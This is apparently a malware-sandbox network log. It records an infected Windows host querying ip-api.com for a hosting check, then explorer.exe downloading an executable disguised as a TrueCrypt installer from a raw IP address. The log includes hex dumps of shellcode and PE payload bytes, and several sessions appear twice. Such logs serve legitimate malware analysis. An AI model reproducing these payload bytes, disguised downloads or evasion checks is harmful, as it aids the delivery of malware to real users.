Nov 18, 2023 10:03:06.461395979 CET	46700	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 53 56 57 83 e0 77 ba 4a 00 00 00 c1 cf 55 f7 da 81 e2 fd 00 00 00 f7 de 83 c7 7a 4f ba 51 00 00 00 Data Ascii: USVWwJUzOQKF~OGNbCov33BN& O
Nov 18, 2023 10:03:06.461409092 CET	46701	IN	Data Raw: cc 69 16 ce 89 b0 4f 4f 4f 94 22 4f 4f 4f 58 74 58 74 00 04 ce 74 a6 4f 4f 4f 58 7d 58 65 ce 81 a5 4f 4f 4f 8e 77 53 58 79 cc 6d 0b 8e 70 d3 40 84 8e 81 8f 58 77 8e 8c 93 40 81 58 71 cc 77 2a 58 74 cc 71 29 58 78 58 78 cc 67 d3 58 74 08 ce 69 5f Data Ascii: iOOO"OOOXtXttOOOX}XeOOOwSXymp@Xw@Xqw*Xtq)XxXxgXti_OOOXqu XwpXdXeXwtXtXgtOOOXeqqq,lOOOuOOOedOOO@iUOOOuvOOO@uOOOXy@w(u^xX@=OOOqJOOOXeiOOOmOOOesOOOXaX
Nov 18, 2023 10:03:06.461421013 CET	46703	IN	Data Raw: 82 4f 4f 4f 58 77 58 77 8e 8d e3 58 71 cc 80 ec 58 77 8e 74 32 58 64 58 61 58 77 42 54 4f 4f 4f 8e 8d c2 95 ce 4f 4f 4f 58 71 58 75 8e 81 cf 40 81 58 65 58 79 0c 0d 58 74 58 75 58 70 58 67 ce 69 5f 4f 4f 4f 40 81 04 8e 75 20 58 77 cc 8f 4d 4a 96 Data Ascii: OOOXwXwXqXwt2XdXaXwBTOOOOOOXqXu@XeXyXtXuXpXgi_OOO@u XwMJOOOe[OOOJL>;OPuXdtwaXq\|OOOus.mDgxXpXyX`Xty@XwHqOOOd(XeXgXwxX`\|u~qOOOw0mx2xXxXgX@u
Nov 18, 2023 10:03:06.461431980 CET	46704	IN	Data Raw: 58 64 ce 6c c9 4f 4f 4f ce 69 8e 4f 4f 4f 58 71 8e 88 92 01 58 77 58 70 cc 67 11 58 71 58 61 40 80 07 58 61 0c ce 89 67 4f 4f 4f 8e 8f 93 cc 74 06 cc 89 df cc 80 01 8e 70 c1 58 7d 58 74 cc 70 3f 05 58 65 07 58 79 8e 87 17 cc 70 01 01 58 61 58 7c Data Ascii: XdlOOOiOOOXqXwXpgXqXa@XagOOOtpX}Xtp?XeXypXaX\|eX\|Xe@X\|thOOO>ahOOOdOOOPPPPPPLOOOPPP7PPPOOOOd@7PPPN7PPP7PPP};PPP??O@+NOO7PPP;PPPPPPLECCPP
Nov 18, 2023 10:03:06.461455107 CET	46705	IN	Data Raw: c4 0d 3b cc 67 47 c6 ca e7 50 50 50 8e 7d 6a 58 60 cc 75 0f cc 89 06 8e 80 c5 ce 8d 77 4f 4f 4f 58 75 8e 78 a1 ce 85 53 4f 4f 4f 8e 88 1c 58 75 8e 84 8e 00 94 dc 4f 4f 4f 08 8e 7f 66 8e 71 b8 8e 75 0c 58 78 58 74 cc 60 e8 cc 6c 19 cc 67 00 ce 89 Data Ascii: ;gGPPP}jX`uwOOOXuxSOOOXuOOOfquXxXt`lgmOOOMXtXpXuJiOOOq @wo%XqmOOOeOOOX\|uXup>Xy"TOOOXaOOOOOOX}Xx~OOOqyDxXy}XpXpOOOqqzOOOqsOOO*gOOO@Xa6"@XTOOO@X\|
Nov 18, 2023 10:03:06.461467028 CET	46707	IN	Data Raw: 4f 4f 4f e9 c6 02 8d 95 21 4f 4f 4f e9 c6 fa 8b 97 1f 4f 4f 4f e9 c6 0a 89 96 21 4f 4f 4f e9 c6 02 87 95 1c 4f 4f 4f e9 c6 fa 85 97 1f 4f 4f 4f e9 c6 0a 83 96 1c 4f 4f 4f e9 c6 02 81 95 1e 4f 4f 4f e9 c6 fa 7f 97 16 4f 4f 4f e9 c6 0a 7d 96 f3 4f Data Ascii: OOO!OOOOOO!OOOOOOOOOOOOOOOOOO}OOO{OOOyOOOwOOOuOOOsOOOqOOOoOOOmOOOkOOOi!OOOgOOOeOOOcOOOa_PPPgOOOO@PPP@PPP
Nov 18, 2023 10:03:06.461482048 CET	46708	IN	Data Raw: 45 eb ec c6 45 ec cf c6 45 ed ff c6 45 ee 40 c6 45 ef f2 c6 45 f0 c3 c6 45 f1 e4 c6 45 f2 05 c6 45 f3 67 c6 45 f4 78 c6 45 f5 58 c6 45 f6 0e c7 45 dc 00 00 00 00 eb 09 8b 45 dc 83 c0 01 89 45 dc 83 7d dc 0f 0f 83 39 01 00 00 8b 4d dc 8a 54 0d e8 Data Ascii: EEEE@EEEEEgExEXEEEE}9MTUEEMMU+UUEEM+MMUUEMEUUEEMMMUUEMEUUEE
Nov 18, 2023 10:03:06.461493015 CET	46709	IN	Data Raw: ea 83 ee 26 83 c0 39 48 c1 c6 aa f7 d6 c1 d3 5e c1 d8 0d f7 df f7 d0 4b ba 88 00 00 00 f7 de c1 ca 08 f7 ea 81 ee 98 00 00 00 83 d8 43 f7 d7 81 ce 90 00 00 00 83 de 1a 0f c8 b8 6b 00 00 00 c1 db 98 f7 d2 bb 2f 00 00 00 c1 d6 17 83 e7 4a 83 eb 11 Data Ascii: &9H^KCk/JN@NON-EhE}%YK:NO-@
Nov 18, 2023 10:03:06.461508989 CET	46711	IN	Data Raw: c6 45 e5 00 c6 45 e6 00 eb ed c7 45 fc 10 00 00 00 c6 45 e5 00 eb 0d c7 45 fc ff ff ff ff b8 2d 38 40 00 c3 c7 45 fc ff ff ff ff 0f b6 45 e5 85 c0 75 04 c6 45 e5 01 c7 45 fc 12 00 00 00 c6 45 e5 00 eb 0d c7 45 fc ff ff ff ff b8 5a 38 40 00 c3 c7 Data Ascii: EEEEE-8@EEuEEEEZ8@EMuEEUuEEuEEEMuEEEUuEEEuEEEMuEEUuEE
Nov 18, 2023 10:03:06.759526968 CET	46713	IN	Data Raw: 6a 00 ff 35 ec 74 44 00 ff d7 8b d8 85 db 75 2e 6a 0c 5e 39 05 90 79 44 00 74 15 ff 75 08 e8 61 1b 00 00 59 85 c0 74 0f 8b 75 08 e9 7b ff ff ff e8 d3 05 00 00 89 30 e8 cc 05 00 00 89 30 5f 8b c3 5b eb 14 56 e8 3a 1b 00 00 59 e8 b8 05 00 00 c7 00 Data Ascii: j5tDu.j^9yDtuaYtu{00_[V:Y3^]UQSEEddE]mc[XY$UQQSVWd5uE=@juuurE@MAd=];d_^[USVW

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.4	49803	208.95.112.1	80	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:07.952967882 CET	46999	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 18, 2023 10:03:08.104377985 CET	47001	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:07 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 40 X-Rl: 43 Data Raw: 74 72 75 65 0a Data Ascii: true

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	208.95.112.1	80	192.168.2.4	49803	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:07.952967882 CET	46999	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 18, 2023 10:03:08.104377985 CET	47001	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:07 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 40 X-Rl: 43 Data Raw: 74 72 75 65 0a Data Ascii: true

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.4	49804	194.49.94.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:08.724215031 CET	47003	OUT	GET /TrueCrypt_lDwnwJ.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.120
Nov 18, 2023 10:03:09.021315098 CET	47005	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:08 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Wed, 15 Nov 2023 20:19:53 GMT ETag: "1186000-60a36a043a58d" Accept-Ranges: bytes Content-Length: 18374656 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 02 80 00 00 5c 18 01 00 b4 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 a0 1f 01 00 04 00 00 97 59 19 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 1d 01 59 01 00 00 00 10 1d 01 9c 1a 00 00 00 50 1d 01 10 11 00 00 00 60 15 01 60 60 00 00 00 00 00 00 00 00 00 00 00 70 1d 01 a0 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 48 15 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 15 1d 01 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 00 80 00 00 10 00 00 00 02 80 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 90 89 05 00 00 20 80 00 00 8a 05 00 00 06 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 b0 a8 8f 00 00 b0 85 00 00 aa 8f 00 00 90 85 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 60 60 00 00 00 60 15 01 00 62 00 00 00 3a 15 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 e8 6b 00 00 00 d0 15 01 00 6c 00 00 00 9c 15 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 a0 b2 06 00 00 40 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 59 01 00 00 00 00 1d 01 00 02 00 00 00 08 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 9c 1a 00 00 00 10 1d 01 00 1c 00 00 00 0a 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 30 1d 01 00 02 00 00 00 26 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 1d 01 00 02 00 00 00 28 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 10 11 00 00 00 50 1d 01 00 12 00 00 00 2a 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 a0 22 02 00 00 70 1d 01 00 24 02 00 00 3c 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$\@Y` YP```p"`H(.text```.data @`.rdata@`@.pdata```b:@0@.xdatakl@0@.bss@`.edataY@0@.idata@0.CRTp0&@@.tls@(@@.rsrcP*@0.reloc"p$<@0B
Nov 18, 2023 10:03:09.021357059 CET	47007	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 a5 3f 15 01 31 c9 c7 00 01 Data Ascii: ff.@H(H?1H?H?Hl?Ho=f8MZuHcP<H8PEtiH2?/tF7H>H>FH<8tS1H(@
Nov 18, 2023 10:03:09.021400928 CET	47008	IN	Data Raw: ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 b5 3a 15 01 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 e8 cf f1 7f 00 48 85 c0 0f 94 c0 0f b6 c0 f7 d8 48 83 c4 28 c3 90 90 90 90 90 90 90 48 8d 0d 09 00 00 Data Ascii: H(H(H:H(H(HH(H@I;fv8HHl$Hl$HD$ H\$(fHD$ H\$(,Hl$HHD$H\$^HD$H\$Ld$M;f*HH$H$H
Nov 18, 2023 10:03:09.021436930 CET	47009	IN	Data Raw: 24 1f 44 88 4c 3e 19 48 8b 74 24 78 4c 8b 44 24 50 e9 e0 fb ff ff e8 0b 99 03 00 48 8d 05 7b ab 9d 00 bb 1e 00 00 00 e8 fa a1 03 00 48 8b 44 24 60 48 8b 5c 24 48 e8 eb a1 03 00 48 8d 05 44 bc 9b 00 bb 02 00 00 00 e8 da a1 03 00 e8 55 99 03 00 48 Data Ascii: $DL>Ht$xLD$PH{HD$`H\$HHDUHt$xLD$PETICH9tHkLkH9s(IHADHkLvkI9rLL;H.HHHDHH
Nov 18, 2023 10:03:09.021472931 CET	47011	IN	Data Raw: 16 01 48 8b 0d 27 67 16 01 48 39 d9 73 37 bf 05 00 00 00 48 8d 35 66 78 95 00 e8 81 b8 04 00 48 89 0d 0a 67 16 01 83 3d 13 d6 1b 01 00 75 09 48 89 05 ea 66 16 01 eb 0d 48 8d 3d e1 66 16 01 90 e8 5b 76 06 00 48 89 1d dc 66 16 01 48 8d 4b fb 48 c1 Data Ascii: H'gH9s7H5fxHg=uHfH=f[vHfHKHHDfDH<HHRHH[ H4Hv0LM@@LMIPLMR`LM[pL$M$L,M=fuHHHHT!MLVwHH
Nov 18, 2023 10:03:09.021509886 CET	47012	IN	Data Raw: 01 d0 89 44 24 08 89 54 24 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 44 24 08 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 59 48 83 ec 20 48 89 6c 24 18 48 8d 6c 24 18 48 8b 48 08 Data Ascii: D$T$D$I;fvYH Hl$Hl$HHHH0fH9Ku-HxH9{u#x@8{uxf@8{uHHO1Hl$H HD$H\$OHD$H\$I;fH(Hl$ Hl$ HD$0H\$81HL$HH\$8HD$0H
Nov 18, 2023 10:03:09.021548033 CET	47013	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 c1 48 d1 e8 48 ba 55 55 55 55 55 55 55 55 48 21 d0 48 21 ca 48 8d 0c 02 48 89 ca 48 c1 e9 02 48 bb 33 33 33 33 33 33 33 33 48 21 d9 48 21 d3 48 01 d9 48 89 ca 48 c1 e9 04 48 01 d1 Data Ascii: HHHUUUUUUUUH!H!HHHH33333333H!H!HHHHHH!HHHHHHHH HL$@M;fMH@H$8H$8H$H*H
Nov 18, 2023 10:03:09.021585941 CET	47015	IN	Data Raw: e8 a9 45 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb bd cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 52 02 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 7c 24 68 31 d2 Data Ascii: EHD$H\$I;fRHHHl$@Hl$@HD$PH\|$h1E1MHDiFCML9IAAEEHEEHEEH1E1L^EiD,0G,LI9~H9wH\$XHD$PLD$8HL$`H\|$hDT$T
Nov 18, 2023 10:03:09.021621943 CET	47016	IN	Data Raw: 64 67 06 00 48 89 f8 48 89 d9 e8 19 67 06 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 0f 1f 40 00 e8 7b 40 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 a2 fd ff ff cc cc 48 89 44 24 08 31 c9 31 d2 eb Data Ascii: dgHHgHD$H\$HL$H\|$ @{@HD$H\$HL$H\|$ HD$114LB@8IDHH9HHD$11<LF@8IDHH9H=tH?H
Nov 18, 2023 10:03:09.021658897 CET	47017	IN	Data Raw: cc cc 80 3d a3 c5 1b 01 01 74 05 e9 d2 06 00 00 48 8b 74 24 08 48 8b 5c 24 10 8a 44 24 20 4c 8d 44 24 28 e9 5a fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d 63 c5 1b 01 01 74 05 e9 f2 06 00 00 48 8b Data Ascii: =tHt$H\$D$ LD$(Z=ctHt$H\$D$LD$ HH@=thH@oooVo_of oo ov0o0ftftftftffffH@
Nov 18, 2023 10:03:09.318027973 CET	47019	IN	Data Raw: 08 48 8b 54 24 10 4c 8b 44 24 20 48 8b 44 24 28 49 89 fa 4c 8d 5c 24 38 e9 df fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 7c 24 08 48 8b 54 24 10 4c 8b 44 24 18 48 8b 44 24 20 49 89 Data Ascii: HT$LD$ HD$(IL\$8H\|$HT$LD$HD$ IL\$(fHnf`f`fpH\|THH HDoftfu%HH9rHoftfuIH)HI8HtHFf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	194.49.94.120	80	192.168.2.4	49804	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:08.724215031 CET	47003	OUT	GET /TrueCrypt_lDwnwJ.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.120
Nov 18, 2023 10:03:09.021315098 CET	47005	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:08 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Wed, 15 Nov 2023 20:19:53 GMT ETag: "1186000-60a36a043a58d" Accept-Ranges: bytes Content-Length: 18374656 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 02 80 00 00 5c 18 01 00 b4 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 a0 1f 01 00 04 00 00 97 59 19 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 1d 01 59 01 00 00 00 10 1d 01 9c 1a 00 00 00 50 1d 01 10 11 00 00 00 60 15 01 60 60 00 00 00 00 00 00 00 00 00 00 00 70 1d 01 a0 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 48 15 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 15 1d 01 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 00 80 00 00 10 00 00 00 02 80 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 90 89 05 00 00 20 80 00 00 8a 05 00 00 06 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 b0 a8 8f 00 00 b0 85 00 00 aa 8f 00 00 90 85 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 60 60 00 00 00 60 15 01 00 62 00 00 00 3a 15 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 e8 6b 00 00 00 d0 15 01 00 6c 00 00 00 9c 15 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 a0 b2 06 00 00 40 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 59 01 00 00 00 00 1d 01 00 02 00 00 00 08 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 9c 1a 00 00 00 10 1d 01 00 1c 00 00 00 0a 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 30 1d 01 00 02 00 00 00 26 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 1d 01 00 02 00 00 00 28 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 10 11 00 00 00 50 1d 01 00 12 00 00 00 2a 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 a0 22 02 00 00 70 1d 01 00 24 02 00 00 3c 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$\@Y` YP```p"`H(.text```.data @`.rdata@`@.pdata```b:@0@.xdatakl@0@.bss@`.edataY@0@.idata@0.CRTp0&@@.tls@(@@.rsrcP*@0.reloc"p$<@0B
Nov 18, 2023 10:03:09.021357059 CET	47007	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 a5 3f 15 01 31 c9 c7 00 01 Data Ascii: ff.@H(H?1H?H?Hl?Ho=f8MZuHcP<H8PEtiH2?/tF7H>H>FH<8tS1H(@
Nov 18, 2023 10:03:09.021400928 CET	47008	IN	Data Raw: ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 b5 3a 15 01 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 e8 cf f1 7f 00 48 85 c0 0f 94 c0 0f b6 c0 f7 d8 48 83 c4 28 c3 90 90 90 90 90 90 90 48 8d 0d 09 00 00 Data Ascii: H(H(H:H(H(HH(H@I;fv8HHl$Hl$HD$ H\$(fHD$ H\$(,Hl$HHD$H\$^HD$H\$Ld$M;f*HH$H$H
Nov 18, 2023 10:03:09.021436930 CET	47009	IN	Data Raw: 24 1f 44 88 4c 3e 19 48 8b 74 24 78 4c 8b 44 24 50 e9 e0 fb ff ff e8 0b 99 03 00 48 8d 05 7b ab 9d 00 bb 1e 00 00 00 e8 fa a1 03 00 48 8b 44 24 60 48 8b 5c 24 48 e8 eb a1 03 00 48 8d 05 44 bc 9b 00 bb 02 00 00 00 e8 da a1 03 00 e8 55 99 03 00 48 Data Ascii: $DL>Ht$xLD$PH{HD$`H\$HHDUHt$xLD$PETICH9tHkLkH9s(IHADHkLvkI9rLL;H.HHHDHH
Nov 18, 2023 10:03:09.021472931 CET	47011	IN	Data Raw: 16 01 48 8b 0d 27 67 16 01 48 39 d9 73 37 bf 05 00 00 00 48 8d 35 66 78 95 00 e8 81 b8 04 00 48 89 0d 0a 67 16 01 83 3d 13 d6 1b 01 00 75 09 48 89 05 ea 66 16 01 eb 0d 48 8d 3d e1 66 16 01 90 e8 5b 76 06 00 48 89 1d dc 66 16 01 48 8d 4b fb 48 c1 Data Ascii: H'gH9s7H5fxHg=uHfH=f[vHfHKHHDfDH<HHRHH[ H4Hv0LM@@LMIPLMR`LM[pL$M$L,M=fuHHHHT!MLVwHH
Nov 18, 2023 10:03:09.021509886 CET	47012	IN	Data Raw: 01 d0 89 44 24 08 89 54 24 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 44 24 08 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 59 48 83 ec 20 48 89 6c 24 18 48 8d 6c 24 18 48 8b 48 08 Data Ascii: D$T$D$I;fvYH Hl$Hl$HHHH0fH9Ku-HxH9{u#x@8{uxf@8{uHHO1Hl$H HD$H\$OHD$H\$I;fH(Hl$ Hl$ HD$0H\$81HL$HH\$8HD$0H
Nov 18, 2023 10:03:09.021548033 CET	47013	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 c1 48 d1 e8 48 ba 55 55 55 55 55 55 55 55 48 21 d0 48 21 ca 48 8d 0c 02 48 89 ca 48 c1 e9 02 48 bb 33 33 33 33 33 33 33 33 48 21 d9 48 21 d3 48 01 d9 48 89 ca 48 c1 e9 04 48 01 d1 Data Ascii: HHHUUUUUUUUH!H!HHHH33333333H!H!HHHHHH!HHHHHHHH HL$@M;fMH@H$8H$8H$H*H
Nov 18, 2023 10:03:09.021585941 CET	47015	IN	Data Raw: e8 a9 45 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb bd cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 52 02 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 7c 24 68 31 d2 Data Ascii: EHD$H\$I;fRHHHl$@Hl$@HD$PH\|$h1E1MHDiFCML9IAAEEHEEHEEH1E1L^EiD,0G,LI9~H9wH\$XHD$PLD$8HL$`H\|$hDT$T
Nov 18, 2023 10:03:09.021621943 CET	47016	IN	Data Raw: 64 67 06 00 48 89 f8 48 89 d9 e8 19 67 06 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 0f 1f 40 00 e8 7b 40 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 a2 fd ff ff cc cc 48 89 44 24 08 31 c9 31 d2 eb Data Ascii: dgHHgHD$H\$HL$H\|$ @{@HD$H\$HL$H\|$ HD$114LB@8IDHH9HHD$11<LF@8IDHH9H=tH?H
Nov 18, 2023 10:03:09.021658897 CET	47017	IN	Data Raw: cc cc 80 3d a3 c5 1b 01 01 74 05 e9 d2 06 00 00 48 8b 74 24 08 48 8b 5c 24 10 8a 44 24 20 4c 8d 44 24 28 e9 5a fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d 63 c5 1b 01 01 74 05 e9 f2 06 00 00 48 8b Data Ascii: =tHt$H\$D$ LD$(Z=ctHt$H\$D$LD$ HH@=thH@oooVo_of oo ov0o0ftftftftffffH@
